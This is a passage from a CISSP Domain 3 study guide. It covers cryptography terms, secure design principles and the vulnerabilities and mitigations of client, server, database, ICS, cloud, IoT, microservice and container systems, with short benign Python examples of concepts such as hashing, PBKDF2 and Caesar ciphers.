very complex; also defined as a set of instructions by which encryption and decryption are done
Argon2: a secure key derivation and password hashing algorithm designed to protect against brute-force and
side-channel attacks; it was the winner of the Password Hashing Competition in 2015 and is considered highly
secure and efficient, especially for systems requiring robust password protection
ASLR: Address space layout randomization (ASLR) is a memory-protection process for operating systems
(OSes) that guards against buffer-overflow attacks by randomizing the location where system executables are
loaded into memory
Block Mode Encryption: using fixed-length sequences of input plaintext symbols as the unit of encryption
Block cipher: method of encrypting text that produces ciphertext, where a cryptographic key and algorithm are
applied to a block of data at once/as a group, instead of one bit at a time; takes a number of bits and encrypts
them in a single unit, padding the plaintext to achieve a multiple of the block size; the Advanced Encryption
Standard (AES) algorithm uses 128-bit blocks
Cipher: always meant to hide the true meaning of a message; always secret; types of ciphers include
transposition, substitution, stream, and block
Ciphertext: altered form of a plaintext message so as to be unreadable for anyone except the intended
recipients (it's a secret)
Cleartext: any information that is unencrypted, although it might be in an encoded form that is not easily
human-readable (such as base64 encoding)
Cloud Controls Matrix (CCM): Cloud Security Alliance (CSA) framework designed to provide security
principles to guide cloud vendors and assist prospective cloud customers in assessing the risks of cloud usage
Code: cryptographic systems of symbols that operate on words or phrases and are sometimes secret, but don't
always provide confidentiality
Collision: occurs when a hash function generates the same output for different inputs
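Because a hash maps arbitrarily large inputs to a fixed-size output, collisions must exist; they are only hard to find when the output space is large enough. A sketch using a deliberately truncated SHA-256 shows how quickly collisions appear in a small output space:

```python
import hashlib

def tiny_hash(data: bytes) -> str:
    """Deliberately weakened hash: only the first 16 bits of SHA-256."""
    return hashlib.sha256(data).hexdigest()[:4]

# With only 2**16 = 65,536 possible outputs, the pigeonhole principle
# guarantees a collision among 65,537 distinct inputs -- and the birthday
# bound finds one after only a few hundred tries on average.
seen = {}
collision = None
for i in range(70_000):
    msg = str(i).encode()
    digest = tiny_hash(msg)
    if digest in seen:
        collision = (seen[digest], msg, digest)
        break
    seen[digest] = msg

print(collision)  # two different inputs sharing the same 16-bit digest
```

A full 256-bit output makes the same birthday search computationally infeasible, which is why collision resistance depends on output length.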
Cryptanalysis: study of techniques for attempting to defeat cryptographic methods and, more generally,
information security services; cryptanalysis is the process of transforming or decoding communications from
non-readable to readable format without having access to the real key; two major types of cryptanalysis:
cryptanalytic attacks and cryptographic attacks
Cryptanalytic attack: attack with a primary goal of deducing the key
Cryptographic Hash function: process or function that transforms an input plaintext into a unique value called
a hash (or hash value); note that hash functions do not use keys, and hashes are one-way functions
where it's infeasible to determine the plaintext from the hash; message digests are an example of cryptographic
hash functions
Cryptography: study of/application of methods to secure the meaning and content of messages, files etc by
disguise, obscuration, or other transformations
Cryptosystem: complete set of hardware, software, communications elements and procedures that allow
parties to communicate, store or use info protected by cryptographic means; includes algorithm, key, and key
management functions
Cryptovariable: parameter associated with a particular cryptographic algorithm; e.g. block size, key length and
number of iterations
Cyber-physical systems: systems that use 'computational means' to control physical devices
Decoding: the reverse process from encoding, converting the encoded message back to plaintext format
Decryption: the reverse process from encryption
Elliptic-curve cryptography (ECC): a newer mainstream asymmetric algorithm; keys are normally 256 bits in length
(a 256-bit ECC key is equivalent to a 3072-bit RSA key), making it more secure and able to offer stronger
resistance to attack
Encoding: action of changing a message or set of info into another format through the use of code; unlike
encryption, encoded info can still be read by anyone with knowledge of the encoding process
Encryption: process and act of converting the message from plaintext to ciphertext (AKA enciphering)
Enterprise Security Architecture: methods to ensure security is aligned with org goals and objectives to
protect critical components (people, process, and technology)
Factoring attack: in terms of the test, only the RSA algorithm uses factoring as the hard math problem; so if
you see factoring attack, think RSA
Fog computing: advanced computational architecture often used as an element in IIoT; fog computing relies on
sensors, IoT devices, or edge computing devices to collect data, then transfers it back to a central location for
processing (centralizing processing and intelligence)
Frequency analysis: form of cryptanalysis that uses frequency of occurrence of letters, words or symbols in
the ciphertext as a way of reducing the search space
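A minimal sketch of the idea, counting letter frequencies in a Caesar-shifted sample (with enough ciphertext, the most frequent letters map to common plaintext letters like 'e' and 't'):

```python
from collections import Counter

# "THE QUICK BROWN FOX JUMPS OVER THE LAZY DOG" under a Caesar shift of 3:
ciphertext = "WKH TXLFN EURZQ IRA MXPSV RYHU WKH ODCB GRJ"

freq = Counter(ch for ch in ciphertext if ch.isalpha())
print(freq.most_common(3))
# In this short sample 'R' tops the list (it stands for plaintext 'O');
# real frequency analysis needs much longer ciphertext to be reliable.
```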
Hybrid encryption system: a system that uses both symmetric and asymmetric encryption
International Data Encryption Algorithm (IDEA): IDEA is a form of symmetric key block cipher encryption that
uses a 128-bit key and operates on 64-bit blocks; it encrypts a 64-bit block of plaintext into a 64-bit block of
ciphertext, and the input plaintext block is divided into four sub-blocks of 16 bits each
Initialization Vector (IV): a random string of bits (aka a nonce) that is XORed with a message, reducing
predictability and repeatability; size of the IV varies by algorithm but normally is the same length as the block
size of the cipher (or as large as the encryption key); IV is the cryptographic version of a random number
Key: the input that controls the operation of the cryptographic algorithm, determining the behavior of the
algorithm and permitting the reliable encryption and decryption of the message
Key clustering: weakness in cryptography where a plain-text message generates identical ciphertext messages
when using the same algorithm but using different keys
Key escrow: process by which keys (asymmetric or symmetric) are placed in a trusted storage agent's custody,
for later retrieval
Key generation: the process of creating a new encryption/decryption key
Key pair: matching set of one public and one private key
Key recovery: process of reconstructing an encryption key from the ciphertext alone; if there is a workable key
recovery system, it means the algorithm is not secure
Key space: represents the total number of possible values of keys in a cryptographic algorithm or password;
keyspace = 2 to the power of the number of bits, so 4 bits = 16 keys, 8 bits = 256 keys
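The keyspace arithmetic can be checked directly:

```python
def key_space(bits: int) -> int:
    """Total number of possible keys for a key of the given bit length."""
    return 2 ** bits

print(key_space(4))              # 16
print(key_space(8))              # 256
print(f"{key_space(128):.2e}")   # 3.40e+38 -- why brute force is infeasible
```

Each added bit doubles the keyspace, which is why key length dominates brute-force resistance.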
Lattice-based Cryptography: Lattice-based cryptography leverages complex grids or constructions known as
lattices for the purpose of encryption and decryption; involves mathematical problems that remain hard to solve
even with the enhanced computational power of quantum computing
Meet-in-the-middle: attack that uses a known plaintext message and both encryption of the plaintext and
decryption of the ciphertext simultaneously in a brute-force manner to identify the encryption key; 2DES is
vulnerable to this attack
Microcontroller: similar to system on a chip (SoC), consists of a CPU, memory, IO devices, and non-volatile
storage (e.g. flash or ROM/PROM/EEPROM); think Raspberry Pi or Arduino
Mobile device deployment models: models for allowing or providing mobile devices for employees include:
BYOD (Bring Your Own Device), COPE (Company Owned/Personally Enabled), CYOD (Choose Your Own
Device), and COBO (Company Owned/Business Only); also consider VDI and VMI options
Mobile device deployment policies: should address things like data ownership, support ownership, patch and
update management, security product management, forensics, privacy, on/offboarding, adherence to corporate
policies, user acceptance, legal concerns, acceptable use policies, camera/video, microphone, Wi-Fi Direct,
tethering and hot spots, contactless payment methods, and infrastructure considerations
Multi-state systems: certified to handle data from different security classifications simultaneously
One-time pad: series of randomly generated symmetric encryption keys, each one to be used only once by the
sender and recipient; to be successful, the key must be generated randomly without any known pattern; the key
must be at least as long as the message to be encrypted; the pads must be protected against physical
disclosure and each pad must be used only one time, then discarded
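A one-time pad reduces to XORing each message byte with a truly random key byte of the same length; a minimal sketch:

```python
import secrets

message = b"ATTACK AT DAWN"
pad = secrets.token_bytes(len(message))  # truly random, as long as the message

# Encrypt and decrypt are the same XOR operation:
ciphertext = bytes(m ^ k for m, k in zip(message, pad))
recovered = bytes(c ^ k for c, k in zip(ciphertext, pad))

print(recovered)  # b'ATTACK AT DAWN'
# The pad must be used once and discarded: XORing two ciphertexts made with
# the same pad cancels the key and leaks the XOR of the two plaintexts.
```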
Out-of-band: transmitting or sharing control information (e.g. encryption keys and crypto variables) by means
of a separate and distinct communications path, channel, or system
Password-Based Key Derivation Function 2 (PBKDF2): securely derives cryptographic keys from passwords;
by applying salting and key stretching (through multiple hashing iterations), PBKDF2 transforms a password into
a cryptographic key that can be used for encrypting data or securely storing passwords; this process makes it
much harder for attackers to guess or brute-force the password, as it increases the computational work
required to test each possible password, improving resistance against attacks
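Python's standard library includes PBKDF2, so the salting and key stretching described above can be demonstrated directly (the iteration count below is an illustrative choice):

```python
import hashlib
import os

password = b"correct horse battery staple"
salt = os.urandom(16)  # unique, random salt per stored password

# Key stretching: 600,000 HMAC-SHA256 iterations deliberately slow
# down every password guess; derive a 32-byte key.
key = hashlib.pbkdf2_hmac("sha256", password, salt, 600_000, dklen=32)
print(len(key))  # 32

# The same password with a different salt yields a completely different key,
# which defeats precomputed rainbow tables:
key2 = hashlib.pbkdf2_hmac("sha256", password, os.urandom(16), 600_000, dklen=32)
print(key != key2)  # True
```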
Pepper: a large constant number used to increase the security of the hashed password further; it is stored
outside of the database holding the hashed passwords
Personal electronic device (PED) security features can usually be managed using mobile device management
(MDM) or unified endpoint management (UEM) solutions, including device authentication, full-device
encryption, communication protection, remote wiping, device lockout, screen locks, GPS and location services,
content management, app control, push notification management, third-party app store control,
rooting/jailbreaking, credential management, and more
Plaintext: message or data in its readable form, not turned into a secret
Post-Quantum Cryptography: development of new types of cryptographic approaches that can be
implemented using conventional computing, and is resistant to quantum computing attacks; note that Lattice-
based cryptography is resistant to most, but not all, quantum attacks (also see my article on quantum
computing threats and opportunities)
Remote attestation: feature of the TPM (Trusted Platform Module) that creates a hash value from the system
configuration to confirm the integrity of the configuration
RTOS: real-time operating system (RTOS) is an operating system specifically designed to manage hardware
resources and run applications with precise timing and high reliability; they are designed to process data with
minimum latency; an RTOS is often stored on ROM; they use deterministic timing, meaning tasks are completed
within a defined time frame, and are designed to operate under hard (i.e. missing a deadline can cause system
failure) or soft (missing a deadline degrades performance but is not catastrophic) real-time conditions
Salting: adds additional bits to a password before hashing it, and helps thwart rainbow table attacks; algorithms
like Argon2, bcrypt, and PBKDF2 add salt and repeat the hashing function many times; salts are stored in the same
database as the hashed password
Salting vs key stretching: salting adds randomness and uniqueness to each password before hashing, which
reduces the effectiveness of rainbow table attacks; key stretching makes the hashing process deliberately slow,
making it much more challenging for attackers to crack passwords using brute-force or precomputed tables;
common password hashing algorithms that use key stretching include PBKDF2, bcrypt, and scrypt
SDx: software-defined everything refers to replacing hardware with software using virtualization; includes
virtualization, virtualized software, virtual networking, containerization, serverless architecture, IaC, SDN, VSAN,
software-defined storage (SDS), VDI, VMI, SDV, and software-defined data center (SDDC)
Session key: a symmetric encryption key generated for one-time use; usually requires a key encapsulation
approach to eliminate key management issues
Sherwood Applied Business Security Architecture (SABSA): Enterprise Security Architecture using a
risk-driven model based on business requirements for security
Static Environments: apps, OSs, hardware, or networks that are created/configured to meet a particular need
or function are set to remain unaltered; static environments, embedded systems, network-enabled devices,
edge, fog, and mobile devices need security management that may include network segmentation, security
layers, app firewalls, manual updates, firmware version control, wrappers, and control redundancy/diversity
Stream mode encryption: system using a process that treats the input plaintext as a continuous flow of
symbols, encrypting one symbol at a time; usually uses a streaming key, with part of the key serving as a
one-time key for each symbol's encryption
Stream cipher: a symmetric key cipher where plaintext digits are combined with a pseudorandom cipher digit
stream; each plaintext digit is encrypted one at a time with the corresponding digit of the keystream, to give a
ciphertext stream
Substitution cipher: uses an encryption algorithm to replace each character or bit of the plaintext message
with a different character; one of the earliest substitution ciphers was developed by Julius Caesar, known as the
"Caesar cipher"
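A minimal Caesar cipher sketch: each letter is replaced by the letter `shift` positions later, wrapping around the alphabet:

```python
def caesar(text: str, shift: int) -> str:
    """Shift each letter by `shift` positions, wrapping around the alphabet."""
    out = []
    for ch in text:
        if ch.isalpha():
            base = ord("A") if ch.isupper() else ord("a")
            out.append(chr((ord(ch) - base + shift) % 26 + base))
        else:
            out.append(ch)  # leave spaces and punctuation untouched
    return "".join(out)

ciphertext = caesar("ATTACK AT DAWN", 3)
print(ciphertext)              # DWWDFN DW GDZQ
print(caesar(ciphertext, -3))  # ATTACK AT DAWN
```

With only 25 possible shifts (and letter frequencies preserved), the Caesar cipher falls instantly to brute force or frequency analysis.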
Symmetric encryption: process that uses the same key (or a simple transformation of it) for both
encryption/decryption
The Open Group Architecture Framework (TOGAF): Enterprise Security Architecture that provides for rapid
and iterative development, defining business goals and aligning them with architecture objectives
Transposition cipher: encryption/decryption process that rearranges the order of the plaintext's characters or bits (transposition) rather than substituting them
Trust and Assurance: trust is the presence of a security mechanism or capability; assurance is how reliable the
security mechanism(s) are at providing security
VESDA: Very Early Smoke Detection Apparatus (an air-sampling smoke detector brand name)
Work factor: (AKA Work function) is a way to measure the strength of a cryptography system, measuring the
effort in terms of cost/time to decrypt messages; amount of effort necessary to break a cryptographic system
using a brute-force attack, measured in elapsed time
Zachman: Enterprise Security Architecture based on a 2-D table of what, how, when, who, where, and why;
crossed with identification, definition, representation, specification, configuration, and instantiation
Zero-knowledge proof: one person demonstrates to another that they can achieve a result that requires
sensitive info without actually disclosing the sensitive info
3.1 Research, implement, and manage engineering processes using secure design
principles (OSG-10 Chpts 1,8,9,16)
Standard secure design principles are:
Least privilege
Secure defaults
Fail securely
Threat modeling
Keep it simple
Separation of duties
Zero trust
Privacy by design
3.1.1 Threat Modeling
Threat modeling: (see Domain 1), a security process where potential threats are identified, categorized,
and analyzed; it can be performed as a proactive measure during design and development or as a
reactive measure once a product has been deployed
Threat modeling identifies the potential harm, the probability of occurrence, the priority of concern,
and the means to eradicate or reduce the threat
Threat modeling commonly involves decomposing the app to understand it and how it interacts
with other components or users; identifying and ranking threats allows potential threats to be
prioritized; identifying how to mitigate those threats finishes the process
3.1.2 Least Privilege
As noted in Domain 2, Least privilege states that subjects are granted only the privileges necessary to
perform assigned work tasks and no more; this concept extends to data and systems
Limiting and controlling privileges based on this concept protects confidentiality and data integrity
3.1.3 Defense in Depth
Defense in Depth: AKA layering, is the use of multiple controls in a series, where a single failed control
should not result in exposure of systems or data; layers should be used in a series (one after the other),
NOT in parallel
When you see terms like levels, multilevel, layers, classifications, zones, realms, compartments,
protection rings, etc., think about Defense in Depth
3.1.4 Secure defaults
Secure defaults: when you think about defaults, consider how something operates brand new, just
turned over to you by the vendor
e.g. wireless router default admin password, or firewall configuration requiring changes to meet an
organization's needs
3.1.5 Fail securely
Fail securely: if a system, asset, or process fails, it shouldn't reveal sensitive information, or be less
secure than during normal operation; failing securely could involve reverting to defaults
Physical vs digital failure table

| State | Digital | Physical |
| ----------- | ---------------------------------- | -------------- |
| Fail-Open | maintain system availability | protect people |
| Fail-Safe | maintain confidentiality/integrity | protect people |
| Fail-Closed | maintain confidentiality/integrity | protect asset |
| Fail-Secure | maintain confidentiality/integrity | protect asset |
3.1.6 Separation of duties (SoD)
Separation of duties (SoD): separation of duties (SoD) and responsibilities ensures that no single person
has total control over a critical function or system; SoD is a process to minimize opportunities for misuse
of data or environment damage; separation of duties helps prevent fraud
e.g. one person sells tickets, another collects tickets and restricts access to ticket holders in a
movie theater
3.1.7 Keep it simple and small
Keep it simple: AKA keep it simple, stupid (KISS), this concept encourages avoiding over-complication
of the environment, organization, or product design
3.1.8 Zero Trust or trust but verify
Zero Trust: "assume breach"; a security concept and alternative to the traditional (castle/moat) approach
where nothing is automatically trusted; instead each request for activity or access is assumed to be from
an unknown and untrusted location until otherwise verified
Trust but verify: based on a Russian proverb, and no longer sufficient; it's the traditional approach of
trusting subjects and devices within a company's security perimeter automatically, leaving an org
vulnerable to insider attacks and providing intruders the ability to easily perform lateral movement
"Never trust, always verify" replaces "trust but verify" as a security design principle by asserting that all
activities by all users/entities must be subject to control, authentication, authorization, and management
at the most granular level possible
Goal is to have every access request authenticated, authorized, and encrypted prior to access being
granted to an asset or resource
See my article on an Overview of Zero Trust Basics
3.1.9 Privacy by design
Privacy by design (PbD): a guideline to integrate privacy protections into products during the earliest
design phase rather than tacking it on at the end of development
Same overall concept as "security by design" or "integrated security" where security is an element
of design and architecture of a product starting at initiation and continuing through the software
development lifecycle (SDLC)
There are 7 recognized principles to achieve privacy by design:
Proactive, preventative: think ahead and design for things that you anticipate might happen
Default setting: make private by default, e.g. social media app shouldn't share user data with
everybody by default
Embedded: build privacy in; donʼt add it later
Full functionality, positive-sum: achieve both security and privacy, not just one or the other
Full lifecycle protection: privacy should be achieved before, during and after a transaction;
part of this is securely disposing of data when it is no longer needed
Visibility, transparency, open: publish the requirements and goals; audit them and publish the
findings
Respect, user-centric: involve end users, providing the right amount of information for them
to make informed decisions about their data
3.1.10 Shared responsibility
Shared responsibility: the security design principle that organizations do not operate in isolation
Everyone in an organization has some level of security responsibility
The job of the CISO and security team is to establish & maintain security
The job of regular employees is to perform their tasks within the confines of security
The job of the auditor is to monitor the environment for violations
Because we participate in shared responsibility we must research, implement, and manage
engineering processes using secure design principles
When working with third parties, especially with cloud providers, each entity needs to understand
their portion of the shared responsibility of performing work operations and maintaining security;
this is often referenced as the cloud shared responsibility model
3.1.11 Secure access service edge
Secure Access Service Edge (SASE): a cloud-delivered framework that brings together networking and
security functions into a unified platform, integrating capabilities like Software-Defined Wide Area
Networking (SD-WAN), Secure Web Gateway (SWG), Cloud Access Security Broker (CASB), Firewall-as-a-
Service (FWaaS), and Zero Trust Network Access (ZTNA); SASE aims to:
Address traditional or legacy security model and architecture limitations by eliminating blind spots
and maintaining enterprise-wide protection via continuous monitoring of user behavior and network
conditions
Secure remote access associated with remote and hybrid work models by providing granular
access controls and identity-based authentication, where every user and device must be
authenticated and authorized for resource access
Enhance cloud adoption by integrating on-premises and cloud environments and providing control
and visibility via the cloud
Bring security and networking closer to users/devices by leveraging edge computing, which
improves performance, reduces latency, and ensures consistent security treatment no matter where
users are geographically
Table comparing SASE to traditional perimeter model:
| Aspect | Traditional Perimeter-Based Model | Secure Access Service Edge (SASE) |
| --- | --- | --- |
| Security Philosophy | "Castle-and-moat": strong perimeter, trusted internal network | Zero Trust: never trust, always verify; identity-based security |
| Network Architecture | Centralized; everything routes through data center or HQ perimeter | Distributed; cloud-native and edge-delivered services |
| Access Location Assumption | Assumes users and resources are inside the network perimeter | Assumes users, devices, and data are everywhere (remote, cloud) |
| Traffic Routing | Backhauls remote traffic to a central location for inspection | Connects users directly to services via nearest cloud edge |
| Key Technologies | Firewalls, VPNs, IDS/IPS, on-prem proxies | SD-WAN, ZTNA, CASB, SWG, FWaaS integrated into a cloud solution |
| Scalability | Difficult to scale; hardware-dependent | Easily scalable, cloud-delivered model |
| Visibility & Control | Limited to on-premises infrastructure | Centralized visibility across users, apps, and devices globally |
| Latency & Performance | Higher latency (especially for remote/cloud access) | Lower latency, local breakout to nearest edge node |
| Cloud & SaaS Integration | Not designed for cloud-native environments | Built for cloud and SaaS access and protection |
| User & Device Trust Model | Implicit trust inside network | Continuous verification based on identity, device posture, etc. |
3.2 Understand the fundamental concepts of security models (e.g. Biba, Star Model,
Bell-LaPadula) (OSG-10 Chpt 8)
Security models:
Intended to provide an explicit set of rules that a computer can follow to implement the fundamental
security concepts, processes, and procedures of a security policy
Provide a way for a designer to map abstract statements into a security policy prescribing the algorithms
and data structures necessary to build hardware and software
Enable people to access only the data classified for their clearance level
State machine model: ensures that all instances of subjects accessing objects are secure
Information flow model: designed to prevent unauthorized, insecure, or restricted information flow; the
Information Flow model is an extension of the state machine concept and serves as the basis of design for both
3.5 Assess and mitigate the vulnerabilities of security architectures, designs and
solution elements (OSG-10 Chpts 6,7,9,16,20)
This objective relates to identifying vulnerabilities and corresponding mitigating controls and solutions; the key is
understanding the types of vulnerabilities commonly present in different environments, and their mitigation options
3.5.1 Client-based systems
Client-based systems: client computers are the most attacked entry point
Compromised client computers can be used to launch other attacks
Productivity software and browsers are constant targets
Even patched client computers are at risk due to phishing and social engineering vectors
Mitigation: run a full suite of security software, including anti-virus/malware, anti-spyware, and host-
based firewall
3.5.2 Server-based systems
Data Flow Control: movement of data between processes, between devices, across a network, or over a
communications channel
Management of data flow seeks to minimize latency/delays, keep traffic confidential (e.g. using
encryption), and avoid traffic overload (e.g. using a load balancer); data flow management can be
provided by network devices/applications and services
While attackers may initially target client computers, servers are often the goal
Mitigation: regular patching, deploying hardened server OS images for builds, and use host-based
firewalls
3.5.3 Database systems
Databases often store a company's most sensitive data (e.g. proprietary, CC info, PHI, and PII)
Cardinality: refers to the number of rows in a table
Degree: refers to the number of columns in a table
Database general ACID properties (Atomicity, Consistency, Isolation and Durability):
Atomicity: transactions are all-or-nothing; a transaction must be an atomic unit of work, i.e., all of
its data modifications are performed, or none are performed
Consistency: transactions must leave the database in a consistent state
Isolation: transactions are processed independently
Durability: once a transaction is committed, it is permanently recorded
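The atomicity property can be demonstrated with Python's built-in sqlite3 module: a two-step transfer either fully commits or fully rolls back, never leaving a partial update.

```python
import sqlite3

# Demonstrate atomicity with an in-memory SQLite database: a transfer
# either fully commits or fully rolls back -- never a partial update.
con = sqlite3.connect(":memory:")
con.execute(
    "CREATE TABLE accounts (name TEXT PRIMARY KEY,"
    " balance INTEGER CHECK (balance >= 0))"
)
con.execute("INSERT INTO accounts VALUES ('alice', 100), ('bob', 50)")
con.commit()

try:
    with con:  # opens a transaction; rolls back automatically on error
        con.execute("UPDATE accounts SET balance = balance - 200 WHERE name = 'alice'")
        con.execute("UPDATE accounts SET balance = balance + 200 WHERE name = 'bob'")
except sqlite3.IntegrityError:
    pass  # CHECK constraint failed: the whole transaction was rolled back

balances = dict(con.execute("SELECT name, balance FROM accounts"))
print(balances)  # alice still has 100, bob still has 50
```

Because alice's balance would go negative, the CHECK constraint aborts the first statement and the `with con:` block rolls back the entire transaction, preserving consistency as well as atomicity.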
Attackers may use inference or aggregation to obtain confidential information
Aggregation attack: based on math; process where SQL provides a number of functions that combine
records from one or more tables to produce potentially useful info
Inference attack: based on human deduction; involves combining several pieces of nonsensitive info to
gain access to that which should be classified at a higher level; inference makes use of the human mindʼs
deductive capacity rather than the raw mathematical ability of database platforms
3.5.4 Cryptographic systems
Goal of a well-implemented cryptographic system is to make compromise too time-consuming and/or
expensive
Each component has vulnerabilities:
Kerckhoffs's Principle (AKA Kerckhoffs's assumption): a cryptographic system should be secure
even if everything about the system, except the key, is public knowledge
Software: used to encrypt/decrypt data; can be a standalone app, command-line, built into the OS
or called via API; like any software, there are likely bugs/issues, so regular patching is important
Keys: dictate how encryption is applied through an algorithm; a key should remain secret, otherwise
the security of the encrypted data is at risk
key space: represents all possible values of a key (an n-bit key has a key space of 2^n)
key space best practices:
key length is an important consideration; use as long of a key as possible (your goal is
to outpace projected increase in cryptanalytic capability during the time the data must
be kept safe); longer keys discourage brute-force attacks
a 256-bit key is typically minimum recommendation for symmetric encryption
2048-bit key typically the minimum for asymmetric
always store secret keys securely, and if you must transmit them over a network, do so
in a manner that protects them from unauthorized disclosure
select the key using an approach that has as much randomness as possible, taking
advantage of the entire key space
destroy keys securely, when no longer needed
always base key length on requirements and sensitivity of the data being handled
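The randomness best practice above can be sketched with Python's stdlib secrets module, which draws from the OS cryptographically secure RNG and so covers the full key space:

```python
import secrets

# Generate a 256-bit symmetric key from the OS cryptographically secure RNG.
key = secrets.token_bytes(32)          # 32 bytes = 256 bits
assert len(key) * 8 == 256

# The key space of a 256-bit key: every bit pattern is a valid key.
key_space = 2 ** 256
print(f"256-bit key space: {key_space:.3e} possible keys")

# Never use random.random()/random.randint() for key material -- the
# default Mersenne Twister generator is predictable once observed.
```

The point of the comparison: brute force must search this space, which is why key length is chosen to outpace projected cryptanalytic capability for the data's required lifetime.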
Algorithms: choose algorithms (or ciphers) with a large key space and a large random key value
(key value is used by an algorithm for the encryption process)
algorithms themselves are not secret; they have extensive public details about history and
how they function
3.5.5 Industrial Control Systems (ICS)
Industrial control systems (ICS): a form of computer-management device that controls industrial
processes and machines, also known as operational technology (OT); there are several forms of ICS
including distributed control systems (DCS), programmable logic controllers (PLC), and supervisory
control and data acquisition (SCADA)
recognize that DCS, PLC, and SCADA are types of ICS; and know how to secure ICS
Supervisory control and data acquisition (SCADA): systems used to control physical devices like those
in an electrical power plant or factory; SCADA systems are well suited for distributed environments, such
as those spanning continents
some SCADA systems still rely on legacy or proprietary communications, putting them at risk,
especially as attackers gain knowledge of such systems and their vulnerabilities
SCADA risk mitigations:
isolate networks
limit access physically and logically
restrict code to only essential apps
log all activity
3.5.6 Cloud-based systems (e.g., Software as a Service (SaaS), Infrastructure as a Service (IaaS), Platform as a
Service (PaaS))
Software as a Service (SaaS): provides fully functional apps typically accessible via a web browser
Platform as a Service (PaaS): provide consumers with a computing platform, including hardware,
operating systems, and a runtime environment
Infrastructure as a Service (IaaS): provide basic computing resources like servers, storage, and
networking
note that IaaS is the model in which the cloud service provider performs the least amount of
maintenance and security (leaving the most responsibility to the customer)
Cloud-based systems: on-demand access to computing resources available from almost anywhere
Cloud's primary challenge: resources are outside the orgʼs direct control, making it more difficult to
manage risk
Orgs should formally define requirements to store and process data stored in the cloud
Focus your efforts on areas that you can control, such as the network entry and exit points (i.e.
firewalls and similar security solutions)
All sensitive data should be encrypted, both for network communication and data-at-rest
Use centralized identity access and management system, with multifactor authentication
Customers shouldnʼt use encryption controlled by the vendor; controlling your own keys eliminates
risks from vendor-based insider threats and supports destruction using cryptographic erase
Community cloud: the cloud environment is maintained, used, and paid for as a shared benefit by
associated users or organizations; benefits might include collaboration, data exchange, and cost savings
compared to private or public clouds
Cryptographic erase: methods that permanently remove the cryptographic keys
Capture diagnostic and security data from cloud-based systems and store in your SIEM system
Ensure cloud configuration matches or exceeds your on-premise security requirements
Understand the cloud vendor's security strategy
Cloud shared responsibility by model:
Software as a Service (SaaS):
the vendor is responsible for all maintenance of the SaaS services
Platform as a Service (PaaS):
customers deploy apps that theyʼve created or acquired, manage their apps, and modify
config settings on the host
the vendor is responsible for maintenance of the host and the underlying cloud infrastructure
Infrastructure as a Service (IaaS):
IaaS models provide basic computing resources to customers
customers install OSs and apps and perform required maintenance
the vendor maintains cloud-based infra, ensuring that customers have access to leased
systems
3.5.7 Distributed systems
Distributed computing environment (DCE): a collection of individual systems that work together to
support a resource or provide a service
DCEs are designed to support communication and coordination among their members in order to achieve
a common function, goal, or operation
Most DCEs have duplicate or concurrent components, are asynchronous, and allow for fail-soft or
independent failure of components
DCE is AKA concurrent computing, parallel computing, and distributed computing
DCE solutions are implemented as client-server, three-tier, multi-tier, and peer-to-peer
Securing distributed systems:
In distributed systems, integrity is sometimes a concern because data and software are spread
across various systems, often in different locations
Client/server model network is AKA a distributed system or distributed architecture
security must be addressed everywhere instead of at a single centralized host
processing and storage that are distributed on multiple clients and servers, and all must be
secured
network links must be secured and protected
3.5.8 Internet of Things (IoT)
Internet of things (IoT): a class of smart devices that are internet-connected in order to provide
automation, remote control, or AI processing to appliances or devices
An IoT device is almost always separate/distinct hardware used on its own or in conjunction with an
existing system
IoT security concerns often relate to access and encryption
IoT is often not designed with security as a core concept, resulting in security breaches; once an
attacker has remote access to the device they may be able to pivot
Securing IoT:
deploy a distinct network for IoT equipment, kept separate and isolated (known as three
dumb routers)
keep systems patched
limit physical and logical access
monitor activity
implement firewalls and filtering
never assume IoT defaults are good enough, evaluate settings and config options, and make
changes to optimize security while supporting business functions
disable remote management and enable secure communication only (such as over HTTPS)
review IoT vendor to understand their history with reported vulnerabilities, response time to
vulnerabilities and their overall approach to security
not all IoT devices are suitable for enterprise networks
3.5.9 Microservices (e.g., application programming interface (API))
Service-oriented Architecture (SOA): constructs new apps or functions out of existing but separate
and distinct software services, and the resulting app is often new; therefore its security issues are
unknown, untested, and unprotected; a derivative of SOA is microservices
Microservices: a feature of web-based solutions and a derivative of SOA; a microservices app is put
together as a collection of loosely coupled, small, and independent services; a microservice is simply
one element, feature, capability, business logic, or function of a web app that can be called upon or
used by other web apps
Microservices are usually small and focused on a single operation, engineered with few
dependencies, and based on fast, short-term development cycles (similar to Agile)
Each microservice exposes an Application Programming Interface (API) providing communication
and interaction with other services; these APIs allow for a modular, flexible, and scalable
architecture
Securing microservices:
use HTTPS only
encrypt everything possible and use routine scanning
closely aligned with microservices is the concept of shifting left, or addressing security
earlier in the SDLC; also integrating it into the CI/CD pipeline
consider the software supply chain (the dependencies and libraries used) when addressing
updates and patching
ensure APIs are secure by using appropriate authentication, authorization, and encryption for
data exchanges
if deployed via containers, ensure appropriate access control, secure images and
configurations; ensure the software is updated and patched regularly
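The API authentication point above can be sketched as a minimal bearer-token check. This is a hypothetical helper, not any specific framework's API; hmac.compare_digest gives a constant-time comparison that avoids timing side channels:

```python
import hmac
import secrets

# Hypothetical API bearer-token validation sketch. In production, tokens
# would live in a secret store, not an in-process set.
VALID_TOKENS = {secrets.token_urlsafe(32)}  # issued tokens

def is_authorized(auth_header):
    """Check an 'Authorization: Bearer <token>' header value."""
    if not auth_header or not auth_header.startswith("Bearer "):
        return False
    presented = auth_header[len("Bearer "):]
    # compare_digest avoids leaking how many characters matched
    return any(hmac.compare_digest(presented, t) for t in VALID_TOKENS)

token = next(iter(VALID_TOKENS))
print(is_authorized(f"Bearer {token}"))   # True
print(is_authorized("Bearer wrong"))      # False
print(is_authorized(None))                # False
```

Served over HTTPS only, this gives the authentication piece; authorization (what the caller may do) is a separate check layered on top.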
3.5.10 Containerization
Containerization: AKA OS virtualization, is based on the concept of eliminating the duplication of OS
elements in a virtual machine; instead, each app is placed into a container that includes only the actual
resources needed to support the app, while the common or shared OS elements are provided by the
underlying host OS (via the container engine rather than a full hypervisor)
Containerization can provide 10 to 100 times more application density per physical server
compared to traditional virtualization
Vendors often have security benchmarks and hardening guidelines to follow to enhance container
security
Securing containers:
container challenges include the lack of isolation compared to a traditional infrastructure of
physical servers and VMs
scan container images to reveal software with vulns
secure your registries: use access controls to limit who can publish images, or even access
the registry
require images to be signed
harden container deployment including the OS of the underlying host, using firewalls, and
VPC rules, and use limited access accounts
reduce the attack surface by minimizing the number of components in each container, and
update and scan them frequently
3.5.11 Serverless
Serverless architecture (AKA function as a service (FaaS)): cloud computing where the customer
manages only the code, while the platform (i.e. the supporting hardware and software, or servers) is
managed by the CSP
